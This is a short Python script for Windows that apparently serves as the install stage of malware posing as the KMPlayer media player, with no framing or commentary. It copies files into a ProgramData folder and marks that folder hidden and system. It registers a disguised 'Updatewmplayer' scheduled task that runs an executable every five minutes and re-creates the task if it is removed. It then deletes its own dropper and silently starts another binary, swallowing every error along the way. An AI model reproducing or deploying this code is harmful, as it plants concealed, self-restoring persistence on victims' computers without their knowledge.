# -*- coding: utf-8 -*-
import datetime
import os
import time
import win32com.client
import shutil
import win32api
import win32con
import string

fe = os.environ["ProgramData"]
fre = string.strip(fe)


def yut():
    try:
        buy = os.getcwd()
        src = buy
        dest = (fre + "\\KMPlayer\\")
        shutil.copytree(src, dest)
    except:
        pass


def takk():
    try:
        scheduler = win32com.client.Dispatch('Schedule.Service')
        scheduler.Connect()
        root_folder = scheduler.GetFolder('\\')
        task_def = scheduler.NewTask(0)
        start_time = datetime.datetime.now() + datetime.timedelta(minutes=1)
        TASK_TRIGGER_DAILY = 1
        trigger = task_def.Triggers.Create(TASK_TRIGGER_DAILY)
        trigger.Repetition.Interval = "PT5M"
        trigger.StartBoundary = start_time.isoformat()
        TASK_ACTION_EXEC = 0
        action = task_def.Actions.Create(TASK_ACTION_EXEC)
        action.ID = 'TRIGGER BATCH'
        action.Path = fre + '\\KMPlayer\\mplayer\\Updatewmplayer.exe'
        action.Arguments = fre + '\\KMPlayer\\mplayer\\Lib\\site-packages\\Player\\Datawmplayer'
        task_def.RegistrationInfo.Description = 'Updatewmplayer'
        task_def.Settings.Enabled = True
        task_def.Settings.StopIfGoingOnBatteries = False
        TASK_CREATE_OR_UPDATE = 6
        TASK_LOGON_NONE = 0
        root_folder.RegisterTaskDefinition(
            'Updatewmplayer',
            task_def,
            TASK_CREATE_OR_UPDATE,
            '',
            '',
            TASK_LOGON_NONE
        )

    except:
        pass


def llp():
    try:

        win32api.SetFileAttributes(fre + "\\KMPlayer\\",
                                   win32con.FILE_ATTRIBUTE_HIDDEN | win32con.FILE_ATTRIBUTE_SYSTEM)
    except:
        pass


def fop():
    try:
        if os.path.exists(fre + "\\KMPlayer\\Projec.exe"):
            os.remove(fre + "\\KMPlayer\\Projec.exe")
    except:
        pass


def htr():
    try:
        cf = (fre + "\\KMPlayer")
        if not os.path.exists(cf):
            time.sleep(30)
            yut()
            time.sleep(25)
            takk()
            time.sleep(10)
            llp()
            time.sleep(15)
            fop()
        else:
            time.sleep(25)
            takk()
    except:
        pass


def vul():
    try:
        n = 0
        while n < 5:
            n = n + 1
            try:
                name = "Updatewmplayer"
                r = os.popen('SCHTASKS /v').read().strip().split('\n')
                ff = str(r)
                g = ff.replace(",", "\n")
                if name in g:
                    pass
                else:
                    takk()
                time.sleep(15)
            except:
                pass
    except:
        pass


def jo():
    try:
        name = "Updatewmplayer"
        r = os.popen('SCHTASKS /v').read().strip().split('\n')
        ff = str(r)
        g = ff.replace(",", "\n")
        if name in g:
            pass
        else:
            try:
                os.popen(
                    "start /B " + fre + "\\KMPlayer\\mplayer\\Searchmplayer.exe " + fre + "\\KMPlayer\\mplayer\\Lib\\site-packages\\Player\\Datawmplayer")
            except:
                pass
    except:
        pass


htr()
vul()
jo()
